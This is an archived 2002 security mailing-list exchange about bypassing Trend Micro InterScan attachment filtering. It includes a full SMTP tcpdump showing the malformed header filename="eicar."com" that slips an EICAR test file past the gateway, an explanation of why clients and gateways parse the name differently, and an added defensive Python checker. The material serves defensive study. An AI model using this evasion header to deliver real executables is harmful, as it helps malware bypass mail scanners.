Dear Onie Camara,

The dump you sent exploits a vulnerability found by Aidan O'Kelly <aidanokellyat_private> (see section I.9 in http://www.security.nnov.ru/advisories/content.asp ). It uses filename="eicar."com" - older versions of Outlook Express and Outlook convert this filename to "eicar.com", others to "eicar._com" - that's why you failed.

--Saturday, February 23, 2002, 8:37:29 PM, you wrote to incidentsat_private:

OC> Hi guys,
OC> I don't know where to post actually.
OC> I am very interested in security and would like some of your help.
OC> I have found, I hope, a vulnerability in Trend Micro interscan viruswall.
OC> I have a setup of qmail and sqwebmail running on freebsd. When I send an
OC> email from sqwebmail containing
OC> the eicar test virus attachment, the attachment is bypassed by Interscan and
OC> is successfully delivered.
OC> I have escalated this to Trend Micro since the early week of January and
OC> until now, even with the latest pattern
OC> file, it is still bypassed.
OC> This is somewhat related to the Feb 18 post at
OC> http://www.securiteam.com/securitynews/5DP0I206AY.html
OC> Now, since I will be doing a pentest for another company, I would like some
OC> help on where I can download
OC> a perl script that will send an exe,com attachment to a mail server but will
OC> bypass the filtering gateway.
OC> I have used this script, http://www.securiteam.com/exploits/5ZP0D2K6AY.html
OC> It works but
OC> the attachment's extension changes. Ex. eicar.com will become eicar._com
OC> Here is a tcpdump:
OC> bash# tcpdump -x -X -s 14400 port not 22 and port not 53 and not arp and
OC> port not 68 and port not 67 and port not 80 and not igmp
OC> tcpdump: listening on xl0
OC> 11:23:45.478174 65.192.117.68.1760 > dhcp-74-1628.smtp: S
OC> 2796302688:2796302688(0) win 16384 <mss 1460,nop,nop,sackOK,nop,wscale
OC> 0,nop,nop,timestamp 546622090 0> (DF)
OC> 0x0000 4500 0040 66b1 4000 3406 1f70 41c0 7544 E..@f.@.4..pA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3160 0000 0000 ..........1`....
OC> 0x0020 b002 4000 6b45 0000 0204 05b4 0101 0402 ..@.kE..........
OC> 0x0030 0103 0300 0101 080a 2094 ca8a 0000 0000 ................
OC> 11:23:45.478679 dhcp-74-1628.smtp > 65.192.117.68.1760: S
OC> 1437153606:1437153606(0) ack 2796302689 win 33304 <mss 1460,nop,wscale
OC> 0,nop,nop,timestamp 908042 546622090> (DF)
OC> 0x0000 4500 003c 0f7c 4000 4006 6aa9 0cf8 fc9a E..<.|@.@.j.....
OC> 0x0010 41c0 7544 0019 06e0 55a9 3946 a6ac 3161 A.uD....U.9F..1a
OC> 0x0020 a012 8218 d41b 0000 0204 05b4 0103 0300 ................
OC> 0x0030 0101 080a 000d db0a 2094 ca8a ............
OC> 11:23:45.494674 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 1 win 17376
OC> <nop,nop,timestamp 546622090 908042> (DF)
OC> 0x0000 4500 0034 42c4 4000 3406 4369 41c0 7544 E..4B.@.4.CiA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3947 ..........1aU.9G
OC> 0x0020 8010 43e0 3e18 0000 0101 080a 2094 ca8a ..C.>...........
OC> 0x0030 000d db0a ....
OC> 11:23:45.530047 dhcp-74-1628.smtp > 65.192.117.68.1760: P 1:43(42) ack 1 win
OC> 33304 <nop,nop,timestamp 908048 546622090> (DF)
OC> 0x0000 4500 005e 7e6d 4000 4006 fb95 0cf8 fc9a E..^~m@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3947 a6ac 3161 A.uD....U.9G..1a
OC> 0x0020 8018 8218 e931 0000 0101 080a 000d db10 .....1..........
OC> 0x0030 2094 ca8a 3232 3020 7072 6f6d 6973 6375 ....220.promiscu
OC> 0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 2045 ous.dyndns.org.E
OC> 0x0050 534d 5450 2050 6f73 7466 6978 0d0a SMTP.Postfix..
OC> 11:23:45.553735 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 43 win 17376
OC> <nop,nop,timestamp 546622090 908048> (DF)
OC> 0x0000 4500 0034 2223 4000 3406 640a 41c0 7544 E..4"#@.4.d.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
OC> 0x0020 8010 43e0 3de8 0000 0101 080a 2094 ca8a ..C.=...........
OC> 0x0030 000d db10 ....
OC> 11:23:45.553933 65.192.117.68.1760 > dhcp-74-1628.smtp: P 1:33(32) ack 43
OC> win 17376 <nop,nop,timestamp 546622090 908048> (DF)
OC> 0x0000 4500 0054 5ac7 4000 3406 2b46 41c0 7544 E..TZ.@.4.+FA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
OC> 0x0020 8018 43e0 85fe 0000 0101 080a 2094 ca8a ..C.............
OC> 0x0030 000d db10 4548 4c4f 2061 6e74 6973 7061 ....EHLO.antispa
OC> 0x0040 6d2e 7265 6d69 6e67 746f 6e6c 7464 2e63 m.remingtonltd.c
OC> 0x0050 6f6d 0d0a om..
OC> 11:23:45.554671 dhcp-74-1628.smtp > 65.192.117.68.1760: P 43:151(108) ack 33
OC> win 33304 <nop,nop,timestamp 908050 546622090> (DF)
OC> 0x0000 4500 00a0 b62a 4000 4006 c396 0cf8 fc9a E....*@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3971 a6ac 3181 A.uD....U.9q..1.
OC> 0x0020 8018 8218 5f91 0000 0101 080a 000d db12 ...._...........
OC> 0x0030 2094 ca8a 3235 302d 7072 6f6d 6973 6375 ....250-promiscu
OC> 0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 0d0a ous.dyndns.org..
OC> 0x0050 3235 302d 5049 5045 4c49 4e49 4e47 0d0a 250-PIPELINING..
OC> 0x0060 3235 302d 5349 5a45 2032 3030 3030 3030 250-SIZE.2000000
OC> 0x0070 300d 0a32 3530 2d56 5246 590d 0a32 3530 0..250-VRFY..250
OC> 0x0080 2d45 5452 4e0d 0a32 3530 2d58 5645 5250 -ETRN..250-XVERP
OC> 0x0090 0d0a 3235 3020 3842 4954 4d49 4d45 0d0a ..250.8BITMIME..
OC> 11:23:45.571627 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 151 win 17268
OC> <nop,nop,timestamp 546622090 908050> (DF)
OC> 0x0000 4500 0034 0598 4000 3406 8095 41c0 7544 E..4..@.4...A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
OC> 0x0020 8010 4374 3dc6 0000 0101 080a 2094 ca8a ..Ct=...........
OC> 0x0030 000d db12 ....
OC> 11:23:45.573727 65.192.117.68.1760 > dhcp-74-1628.smtp: P 33:101(68) ack 151
OC> win 17376 <nop,nop,timestamp 546622090 908050> (DF)
OC> 0x0000 4500 0078 01ee 4000 3406 83fb 41c0 7544 E..x..@.4...A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
OC> 0x0020 8018 43e0 4202 0000 0101 080a 2094 ca8a ..C.B...........
OC> 0x0030 000d db12 4d41 494c 2046 524f 4d3a 3c3e ....MAIL.FROM:<>
OC> 0x0040 2053 495a 453d 3131 3139 0d0a 5243 5054 .SIZE=1119..RCPT
OC> 0x0050 2054 4f3a 3c6e 6569 6c40 7265 7374 7269 .TO:<neil@restri
OC> 0x0060 6374 6564 2e64 796e 646e 732e 6f72 673e cted.dyndns.org>
OC> 0x0070 0d0a 4441 5441 0d0a ..DATA..
OC> 11:23:45.580592 dhcp-74-1628.smtp > 65.192.117.68.1760: P 151:204(53) ack
OC> 101 win 33304 <nop,nop,timestamp 908053 546622090> (DF)
OC> 0x0000 4500 0069 6a03 4000 4006 0ff5 0cf8 fc9a E..ij.@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 39dd a6ac 31c5 A.uD....U.9...1.
OC> 0x0020 8018 8218 502b 0000 0101 080a 000d db15 ....P+..........
OC> 0x0030 2094 ca8a 3235 3020 4f6b 0d0a 3235 3020 ....250.Ok..250.
OC> 0x0040 4f6b 0d0a 3335 3420 456e 6420 6461 7461 Ok..354.End.data
OC> 0x0050 2077 6974 6820 3c43 523e 3c4c 463e 2e3c .with.<CR><LF>.<
OC> 0x0060 4352 3e3c 4c46 3e0d 0a CR><LF>..
OC> 11:23:45.607780 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 204 win 17323
OC> <nop,nop,timestamp 546622090 908053> (DF)
OC> 0x0000 4500 0034 2d7e 4000 3406 58af 41c0 7544 E..4-~@.4.X.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
OC> 0x0020 8010 43ab 3d13 0000 0101 080a 2094 ca8a ..C.=...........
OC> 0x0030 000d db15 ....
OC> 11:23:45.615561 65.192.117.68.1760 > dhcp-74-1628.smtp: P 101:1229(1128) ack
OC> 204 win 17376 <nop,nop,timestamp 546622090 908053> (DF)
OC> 0x0000 4500 049c 4e19 4000 3406 33ac 41c0 7544 E...N.@.4.3.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
OC> 0x0020 8018 43e0 715b 0000 0101 080a 2094 ca8a ..C.q[..........
OC> 0x0030 000d db15 5265 6365 6976 6564 3a20 6672 ....Received:.fr
OC> 0x0040 6f6d 2079 6f75 2028 6c6f 6361 6c68 6f73 om.you.(localhos
OC> 0x0050 7420 5b31 3237 2e30 2e30 2e31 5d29 0d0a t.[127.0.0.1])..
OC> 0x0060 0962 7920 616e 7469 7370 616d 2e72 656d .by.antispam.rem
OC> 0x0070 696e 6774 6f6e 6c74 642e 636f 6d20 2850 ingtonltd.com.(P
OC> 0x0080 6f73 7466 6978 2920 7769 7468 2053 4d54 ostfix).with.SMT
OC> 0x0090 5020 6964 2036 3730 4237 4538 4434 0d0a P.id.670B7E8D4..
OC> 0x00a0 0966 6f72 203c 6e65 696c 4072 6573 7472 .for.<neil@restr
OC> 0x00b0 6963 7465 642e 6479 6e64 6e73 2e6f 7267 icted.dyndns.org
OC> 0x00c0 3e3b 2053 6174 2c20 3233 2046 6562 2032 >;.Sat,.23.Feb.2
OC> 0x00d0 3030 3220 3131 3a31 363a 3137 202d 3036 002.11:16:17.-06
OC> 0x00e0 3030 2028 4353 5429 0d0a 4672 6f6d 3a20 00.(CST)..From:.
OC> 0x00f0 736f 6d65 4072 656d 696e 6774 6f6e 6c74 some@remingtonlt
OC> 0x0100 642e 636f 6d0d 0a54 6f3a 206e 6569 6c40 d.com..To:.neil@
OC> 0x0110 7265 7374 7269 6374 6564 2e64 796e 646e restricted.dyndn
OC> 0x0120 732e 6f72 670d 0a53 7562 6a65 6374 3a20 s.org..Subject:.
OC> 0x0130 7465 7374 0d0a 4d49 4d45 2d56 6572 7369 test..MIME-Versi
OC> 0x0140 6f6e 3a20 312e 300d 0a43 6f6e 7465 6e74 on:.1.0..Content
OC> 0x0150 2d54 7970 653a 206d 756c 7469 7061 7274 -Type:.multipart
OC> 0x0160 2f72 656c 6174 6564 3b0d 0a20 2020 2020 /related;.......
OC> 0x0170 2020 2074 7970 653d 226d 756c 7469 7061 ...type="multipa
OC> 0x0180 7274 2f61 6c74 6572 6e61 7469 7665 223b rt/alternative";
OC> 0x0190 0d0a 2020 2020 2020 2020 626f 756e 6461 ..........bounda
OC> 0x01a0 7279 3d22 4e65 7874 5061 7274 3139 220d ry="NextPart19".
OC> 0x01b0 0a4d 6573 7361 6765 2d49 643a 203c 3230 .Message-Id:.<20
OC> 0x01c0 3032 3032 3233 3137 3136 3137 2e36 3730 020223171617.670
OC> 0x01d0 4237 4538 4434 4061 6e74 6973 7061 6d2e B7E8D4@antispam.
OC> 0x01e0 7265 6d69 6e67 746f 6e6c 7464 2e63 6f6d remingtonltd.com
OC> 0x01f0 3e0d 0a44 6174 653a 2053 6174 2c20 3233 >..Date:.Sat,.23
OC> 0x0200 2046 6562 2032 3030 3220 3131 3a31 363a .Feb.2002.11:16:
OC> 0x0210 3137 202d 3036 3030 2028 4353 5429 0d0a 17.-0600.(CST)..
OC> 0x0220 0d0a 5468 6973 2069 7320 6120 6d75 6c74 ..This.is.a.mult
OC> 0x0230 692d 7061 7274 206d 6573 7361 6765 2069 i-part.message.i
OC> 0x0240 6e20 4d49 4d45 2066 6f72 6d61 742e 0d0a n.MIME.format...
OC> 0x0250 0d0a 2d2d 4e65 7874 5061 7274 3139 0d0a ..--NextPart19..
OC> 0x0260 436f 6e74 656e 742d 5479 7065 3a20 6d75 Content-Type:.mu
OC> 0x0270 6c74 6970 6172 742f 616c 7465 726e 6174 ltipart/alternat
OC> 0x0280 6976 653b 0d0a 2020 2020 2020 2020 626f ive;..........bo
OC> 0x0290 756e 6461 7279 3d22 4e65 7874 5061 7274 undary="NextPart
OC> 0x02a0 3230 220d 0a0d 0a2d 2d4e 6578 7450 6172 20"....--NextPar
OC> 0x02b0 7432 300d 0a43 6f6e 7465 6e74 2d54 7970 t20..Content-Typ
OC> 0x02c0 653a 2074 6578 742f 706c 6169 6e0d 0a43 e:.text/plain..C
OC> 0x02d0 6f6e 7465 6e74 2d54 7261 6e73 6665 722d ontent-Transfer-
OC> 0x02e0 456e 636f 6469 6e67 3a20 7175 6f74 6564 Encoding:.quoted
OC> 0x02f0 2d70 7269 6e74 6162 6c65 0d0a 0d0a 2d2d -printable....--
OC> 0x0300 4e65 7874 5061 7274 3230 0d0a 436f 6e74 NextPart20..Cont
OC> 0x0310 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-Type:.text/h
OC> 0x0320 746d 6c3b 0d0a 2020 2020 2020 2020 6368 tml;..........ch
OC> 0x0330 6172 7365 743d 2269 736f 2d38 3835 392d arset="iso-8859-
OC> 0x0340 3122 0d0a 436f 6e74 656e 742d 5472 616e 1"..Content-Tran
OC> 0x0350 7366 6572 2d45 6e63 6f64 696e 673a 2071 sfer-Encoding:.q
OC> 0x0360 756f 7465 642d 7072 696e 7461 626c 650d uoted-printable.
OC> 0x0370 0a0d 0a74 6573 740d 0a2d 2d4e 6578 7450 ...test..--NextP
OC> 0x0380 6172 7432 302d 2d0d 0a0d 0a2d 2d4e 6578 art20--....--Nex
OC> 0x0390 7450 6172 7431 390d 0a43 6f6e 7465 6e74 tPart19..Content
OC> 0x03a0 2d54 7970 653a 2061 7070 6c69 6361 7469 -Type:.applicati
OC> 0x03b0 6f6e 2f78 2d6d 7364 6f77 6e6c 6f61 640d on/x-msdownload.
OC> 0x03c0 0a43 6f6e 7465 6e74 2d44 6973 706f 7369 .Content-Disposi
OC> 0x03d0 7469 6f6e 3a20 6174 7461 6368 6d65 6e74 tion:.attachment
OC> 0x03e0 3b66 696c 656e 616d 653d 2265 6963 6172 ;filename="eicar
OC> 0x03f0 2e22 636f 6d22 0d0a 436f 6e74 656e 742d ."com"..Content-
OC> 0x0400 5472 616e 7366 6572 2d45 6e63 6f64 696e Transfer-Encodin
OC> 0x0410 673a 2062 6173 6536 340d 0a0d 0a57 4456 g:.base64....WDV
OC> 0x0420 5049 5641 6c51 4546 5157 7a52 6355 4670 PIVAlQEFQWzRcUFp
OC> 0x0430 594e 5451 6f55 4634 704e 304e 444b 5464 YNTQoUF4pN0NDKTd
OC> 0x0440 394a 4556 4a51 3046 534c 564e 5551 5535 9JEVJQ0FSLVNUQU5
OC> 0x0450 4551 564a 454c 5546 4f56 456c 5753 564a EQVJELUFOVElWSVJ
OC> 0x0460 5655 7931 5552 564e 550d 0a4c 555a 4a54 VUy1URVNU..LUZJT
OC> 0x0470 4555 684a 4567 7253 436f 4e43 673d 3d0d EUhJEgrSCoNCg==.
OC> 0x0480 0a0d 0a2d 2d4e 6578 7450 6172 7431 392d ...--NextPart19-
OC> 0x0490 2d0d 0a2e 0d0a 5155 4954 0d0a -.....QUIT..
OC> 11:23:45.709692 dhcp-74-1628.smtp > 65.192.117.68.1760: . ack 1229 win 33304
OC> <nop,nop,timestamp 908066 546622090> (DF)
OC> 0x0000 4500 0034 cc50 4000 4006 addc 0cf8 fc9a E..4.P@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
OC> 0x0020 8010 8218 fa30 0000 0101 080a 000d db22 .....0........."
OC> 0x0030 2094 ca8a ....
OC> 11:23:47.074647 dhcp-74-1628.smtp > 65.192.117.68.1760: P 204:243(39) ack
OC> 1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
OC> 0x0000 4500 005b 9c6c 4000 4006 dd99 0cf8 fc9a E..[.l@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
OC> 0x0020 8018 8218 00bc 0000 0101 080a 000d dbaa ................
OC> 0x0030 2094 ca8a 3235 3020 4f6b 3a20 7175 6575 ....250.Ok:.queu
OC> 0x0040 6564 2061 7320 3843 4237 3635 3334 3745 ed.as.8CB765347E
OC> 0x0050 0d0a 3232 3120 4279 650d 0a ..221.Bye..
OC> 11:23:47.074908 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
OC> 1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
OC> 0x0000 4500 0034 fa45 4000 4006 7fe7 0cf8 fc9a E..4.E@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362d A.uD....U.:9..6-
OC> 0x0020 8011 8218 f980 0000 0101 080a 000d dbaa ................
OC> 0x0030 2094 ca8a ....
OC> 11:23:47.091722 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 243 win 17376
OC> <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 4a13 4000 3406 3c1a 41c0 7544 E..4J.@.4.<.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
OC> 0x0020 8010 43e0 37b7 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.092205 65.192.117.68.1760 > dhcp-74-1628.smtp: F 1229:1229(0) ack
OC> 243 win 17376 <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 4ca3 4000 3406 398a 41c0 7544 E..4L.@.4.9.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
OC> 0x0020 8011 43e0 37b6 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.092519 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
OC> 1230 win 33304 <nop,nop,timestamp 908204 546622093> (DF)
OC> 0x0000 4500 0034 f518 4000 4006 8514 0cf8 fc9a E..4..@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362e A.uD....U.:9..6.
OC> 0x0020 8011 8218 f97a 0000 0101 080a 000d dbac .....z..........
OC> 0x0030 2094 ca8d ....
OC> 11:23:47.097243 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
OC> <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 5a93 4000 3406 2b9a 41c0 7544 E..4Z.@.4.+.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
OC> 0x0020 8010 43e0 37b5 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.109155 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
OC> <nop,nop,timestamp 546622093 908204> (DF)
OC> 0x0000 4500 0034 3e09 4000 3406 4824 41c0 7544 E..4>.@.4.H$A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
OC> 0x0020 8010 43e0 37b3 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbac ....
OC> ^C

-- 
~/ZARAZA
Electric shocks are very useful for forming character. (Lem)
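The point of 3APA3A's reply is that the header captured above, `Content-Disposition: attachment;filename="eicar."com"`, is a malformed quoted-string that different MIME parsers resolve to different filenames: a strict RFC 2045 parser stops at the first unescaped quote, a gateway that strips the outer quotes and sanitizes the leftover quote character yields `eicar._com`, and the older Outlook/Outlook Express behaviour named in the reply yields `eicar.com`. A gateway that checks the extension of only its own interpretation can therefore pass an attachment the client will save under a blocked extension. The following added example (not code from the thread, nor from any of the products mentioned) implements the three interpretations and a check that blocks the part if the parameter is malformed or if any interpretation ends in a blocked extension. The `BLOCKED` extension list is an assumed policy for the example, and the header string is constructed from the capture.

```python
"""Added example: resolve a MIME filename parameter the way several
different parsers would, and block an attachment if any resolution
lands on a forbidden extension or the parameter is malformed."""
import re

# Constructed from the Content-Disposition header seen in the tcpdump above.
HEADER = 'attachment;filename="eicar."com"'

# Assumed gateway policy for this example (not from the thread).
BLOCKED = {"com", "exe", "pif", "scr", "bat", "vbs"}

_PARAM = re.compile(r';\s*filename\s*=\s*(.*)', re.IGNORECASE | re.DOTALL)


def raw_filename_param(disposition: str) -> str:
    """Return the raw text after 'filename=' (quotes included), or '' if absent."""
    m = _PARAM.search(disposition)
    return m.group(1).strip() if m else ""


def parse_strict(raw: str):
    """RFC 2045/2822 quoted-string: the value ends at the first unescaped quote.
    Returns (value, malformed); malformed is True if anything trails the value
    or the quote is never closed."""
    if not raw.startswith('"'):
        tok = re.match(r'[^\s;"]*', raw).group(0)      # bare token form
        return tok, raw[len(tok):].strip() != ""
    i, out = 1, []
    while i < len(raw):
        c = raw[i]
        if c == "\\" and i + 1 < len(raw):             # quoted-pair
            out.append(raw[i + 1])
            i += 2
            continue
        if c == '"':
            return "".join(out), raw[i + 1:].strip() != ""
        out.append(c)
        i += 1
    return "".join(out), True                          # unterminated quote


def parse_outer_quotes_sanitize(raw: str) -> str:
    """Strip one leading and one trailing quote, then replace characters that
    are illegal in a filename with '_' (the eicar._com result in the thread)."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        raw = raw[1:-1]
    return re.sub(r'[\\/:*?"<>|]', "_", raw)


def parse_drop_all_quotes(raw: str) -> str:
    """Delete every quote character (the eicar.com result the reply attributes
    to older Outlook / Outlook Express)."""
    return raw.replace('"', "")


def candidate_names(disposition: str):
    """Set of filenames a recipient might end up with, plus a malformed flag."""
    raw = raw_filename_param(disposition)
    strict, malformed = parse_strict(raw)
    names = {strict, parse_outer_quotes_sanitize(raw), parse_drop_all_quotes(raw)}
    return names, malformed


def extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def verdict(disposition: str):
    """('block'|'pass', sorted candidate names, names hitting the policy, malformed)."""
    names, malformed = candidate_names(disposition)
    hits = sorted(n for n in names if extension(n) in BLOCKED)
    decision = "block" if (malformed or hits) else "pass"
    return decision, sorted(names), hits, malformed


if __name__ == "__main__":
    print(verdict(HEADER))
    print(verdict('attachment; filename="report.txt"'))
```

Rejecting the part as soon as `parse_strict` reports a malformed parameter is the simpler policy; computing the candidate set as well makes the log entry explain which interpretation would have reached the user under a blocked name.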
This archive was generated by hypermail 2b30 : Sun Feb 24 2002 - 20:50:01 PST